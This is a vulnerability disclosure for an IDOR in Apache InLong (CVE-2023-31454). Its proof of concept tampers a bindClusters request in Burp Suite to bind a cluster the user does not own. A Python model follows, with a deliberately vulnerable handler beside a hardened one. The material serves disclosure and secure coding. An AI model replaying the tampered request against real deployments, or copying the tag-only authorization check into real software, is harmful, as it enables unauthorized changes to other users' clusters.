IDOR lets users bind any cluster in apache/inlong
Reported on
Apr 17th 2023
Proof of Concept
1. Admin creates cluster1, cluster2, clusterTag1 and clusterTag2.
2. Admin adds user1 as owner of cluster1 and clusterTag1.
3. user1 binds clusterTag1 to cluster1.
4. user1 intercepts the request with Burp Suite.
5. The request content is:
{"clusterTag":"biaoqia4","bindClusters":[1]}
6. Change the request content to:
{"clusterTag":"biaoqia4","bindClusters":[1,2]}
2 is the id of cluster2; user1 is not the owner of cluster2.
7. Result:
{"success":true,"errMsg":null,"data":true}
Impact
An attacker can bind any cluster, even if they are not the owner of that cluster.
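The defect in the report is that the bind endpoint authorizes the caller against the cluster tag but trusts every id in bindClusters without checking that the caller owns each target cluster. The model below is an added example, not InLong's code and not the fix in PR 7949 (whose details are not on this page): a hypothetical vulnerable handler beside a hardened one that checks ownership of every target before binding anything. The store, usernames, cluster ids and request bodies are constructed sample data shaped like the report's requests.

```python
"""Model of a cluster-tag bind endpoint (hypothetical, not InLong's code).

bind_vulnerable() reproduces the IDOR from the report: it checks that the
caller owns the cluster tag, then binds every cluster id in the request.
bind_fixed() additionally verifies ownership of each target cluster id and
refuses the whole request if any id is not owned by the caller.
"""
import json
from dataclasses import dataclass, field


@dataclass
class Store:
    """In-memory stand-in for the manager database (constructed)."""
    cluster_owners: dict = field(default_factory=dict)  # cluster id -> {owners}
    tag_owners: dict = field(default_factory=dict)      # cluster tag -> {owners}
    bindings: dict = field(default_factory=dict)        # cluster id -> {bound tags}


def sample_store() -> Store:
    """State after steps 1 and 2 of the report (constructed sample data):
    two clusters, two tags, user1 owns cluster1 and clusterTag1 only."""
    return Store(
        cluster_owners={1: {"admin", "user1"}, 2: {"admin"}},
        tag_owners={"clusterTag1": {"admin", "user1"}, "clusterTag2": {"admin"}},
    )


# Request bodies shaped like the ones in the report (constructed; the tag
# name is the step name rather than the value captured in the original PoC).
ORIGINAL_REQUEST = '{"clusterTag":"clusterTag1","bindClusters":[1]}'
TAMPERED_REQUEST = '{"clusterTag":"clusterTag1","bindClusters":[1,2]}'


def _parse(body: str):
    req = json.loads(body)
    tag = req["clusterTag"]
    targets = req["bindClusters"]
    if not isinstance(tag, str) or not isinstance(targets, list):
        raise ValueError("malformed bind request")
    if not all(isinstance(c, int) for c in targets):
        raise ValueError("bindClusters must contain integer cluster ids")
    return tag, targets


def bind_vulnerable(store: Store, user: str, body: str) -> dict:
    """Vulnerable pattern: ownership is checked for the tag only."""
    tag, targets = _parse(body)
    if user not in store.tag_owners.get(tag, set()):
        return {"success": False, "errMsg": "not owner of cluster tag", "data": None}
    # Every id in bindClusters is trusted, so a tampered id is bound too.
    for cid in targets:
        store.bindings.setdefault(cid, set()).add(tag)
    return {"success": True, "errMsg": None, "data": True}


def bind_fixed(store: Store, user: str, body: str) -> dict:
    """Hardened pattern: authorize every object the request names, and do it
    before any write so a rejected request leaves no partial binding."""
    tag, targets = _parse(body)
    if user not in store.tag_owners.get(tag, set()):
        return {"success": False, "errMsg": "not owner of cluster tag", "data": None}
    # Unknown ids are treated the same as ids owned by someone else, so the
    # response does not reveal which cluster ids exist.
    not_owned = [c for c in targets if user not in store.cluster_owners.get(c, set())]
    if not_owned:
        return {
            "success": False,
            "errMsg": f"user {user} is not owner of cluster(s) {not_owned}",
            "data": None,
        }
    for cid in targets:
        store.bindings.setdefault(cid, set()).add(tag)
    return {"success": True, "errMsg": None, "data": True}


if __name__ == "__main__":
    s = sample_store()
    print("vulnerable:", bind_vulnerable(s, "user1", TAMPERED_REQUEST), s.bindings)
    s = sample_store()
    print("fixed:     ", bind_fixed(s, "user1", TAMPERED_REQUEST), s.bindings)
```

The detection-side takeaway is the same as the fix: a bind request whose bindClusters contains an id the caller does not own should be logged as a rejected authorization decision, not silently dropped, since the tampered request in the report is indistinguishable from a legitimate one at the transport layer.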
The team accepts this report as a security vulnerability and is planning to issue a CVE for it. There is a tentative fix at https://github.com/apache/inlong/pull/7949; if you have a chance, we would much appreciate your review. We'd appreciate it if you'd keep this issue private until we have released a version with the fix and disclosed the CVE.
This issue was disclosed as CVE-2023-31454: https://www.cve.org/CVERecord?id=CVE-2023-31454